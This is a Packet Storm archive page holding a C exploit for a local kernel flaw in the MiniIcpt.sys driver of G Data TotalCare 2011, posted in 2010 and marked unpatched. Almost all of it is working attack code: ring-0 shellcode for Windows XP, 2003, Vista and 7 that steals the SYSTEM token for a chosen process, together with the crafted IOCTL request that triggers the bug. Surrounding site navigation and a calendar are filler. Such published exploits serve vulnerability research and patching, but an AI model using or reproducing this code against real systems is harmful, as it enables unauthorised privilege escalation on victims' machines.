what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

G Data TotalCare 2011 Local Kernel Exploit

G Data TotalCare 2011 Local Kernel Exploit
Posted Nov 8, 2010
Authored by Nikita Tarakanov

G Data Totalcare 2011 local kernel exploit.

tags | exploit, kernel, local
SHA-256 | da43e18bec79496110a6dc0bbaa56c4065a4f2694579e4ebb125fc8ce47db60a

G Data TotalCare 2011 Local Kernel Exploit

Change Mirror Download
/*
# Exploit Title: G Data TotalCare 2011 0day Local Kernel Exploit
# Date: 2010-11-08
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.gdata.de/
# Version: up to date, version 21.1.0.5, MiniIcpt.sys version 1.0.8.9
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <stdio.h>
#include "winsock2.h"
#include <windows.h>

#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "Ws2_32.lib")


static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xd8\x00\x00\x00"
"\x89\x88\xd8\x00\x00\x00"
"\x90";

static unsigned char winvista_ring0_shell[] =
/* _ring0 */
"\x64\xa1\x24\x01\x00\x00"
//"\x8b\x00"
"\x8b\x70\x48"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x9c\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\xa4\x00\x00\x00"
"\x2d\xa0\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x9c\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\xa4\x00\x00\x00"
"\x2d\xa0\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xe0\x00\x00\x00"
"\x89\x88\xe0\x00\x00\x00"
"\x90";


static unsigned char win7_ring0_shell[] =
/* _ring0 */
"\x64\xa1\x24\x01\x00\x00"
"\x8b\x70\x50"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\xb4\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\xbc\x00\x00\x00"
"\x2d\xb8\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\xb4\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\xbc\x00\x00\x00"
"\x2d\xb8\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xf8\x00\x00\x00"
"\x89\x88\xf8\x00\x00\x00"
"\x90";


static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\x70\x44"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xc8\x00\x00\x00"
"\x89\x88\xc8\x00\x00\x00"
"\x90";


static unsigned char freeze[] =
"\xeb\xfe";// jmp $0



void craft_fake_flt_context(char* buff, LPVOID shellcode_addr)
{
DWORD references = 1;
DWORD *Entry;

Entry = (DWORD*)malloc(0x8);

Entry[0] = Entry;//Entry[0] == esi
Entry[1] = shellcode_addr;//[esi+4] - r0 shellcode

memcpy(buff-0x4, &references, 0x4);
memcpy(buff-0x28, Entry, 0x4);
}

static PCHAR fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;

dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

printf("dwMajorVersion = %d dwMinorVersion %d\n", dwMajorVersion, dwMinorVersion);

switch (dwMajorVersion)
{
case 5:
switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);

case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);

default:
printf("GetVersion, unsupported version\n");
exit(EXIT_FAILURE);
}

case 6:
switch (dwMinorVersion)
{
case 0:
*zlen = sizeof winvista_ring0_shell - 1;
*(PDWORD) &winvista_ring0_shell[54] = ppid;
return (winvista_ring0_shell);

case 1:
*zlen = sizeof win7_ring0_shell - 1;
*(PDWORD) &win7_ring0_shell[54] = ppid;
return (win7_ring0_shell);

default:
printf("GetVersion, unsupported version\n");
exit(EXIT_FAILURE);
}

default:
printf("GetVersion, unsupported version\n");
exit(EXIT_FAILURE);
}

return (NULL);
}


int main(int argc, char **argv)
{
HANDLE hDevice, hThread;
char *inbuff, *inbuffer;
DWORD *buff;
DWORD ioctl = 0x83170180, in = 0xC, out = 0x0C, len, zlen, ppid;
LPVOID zpage, zbuf;

printf ("G Data TotalCare 2011 0day Local Kernel Exploit\n"
"by: Nikita Tarakanov (CISS Research Team)\n");


if (argc <= 1)
{
printf("Usage: %s <processid to elevate>\n", argv[0]);
return 0;
}

ppid = atoi(argv[1]);

zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
printf("VirtualAlloc failed\n");
return 0;
}
printf("Ring 0 shellcode at 0x%08X address\n", zpage, 0x10000);

memset(zpage, 0xCC, 0x1000);
zbuf = fixup_ring0_shell(ppid, &zlen);
memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);


if ( (hDevice = CreateFileA("\\\\.\\MiniIcptControlDevice0",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}

inbuff = (char *)malloc(0x1000);
memset(inbuff, 0x90, 0x1000);
buff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}


inbuffer = inbuff + 0x40;
printf("crafting\n");
craft_fake_flt_context(inbuffer, zpage);
printf("deviceio!\n");
buff[0] = inbuffer;

DeviceIoControl(hDevice, ioctl, buff, in, buff, out, &len, NULL);
free(inbuff);

return 0;

}

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close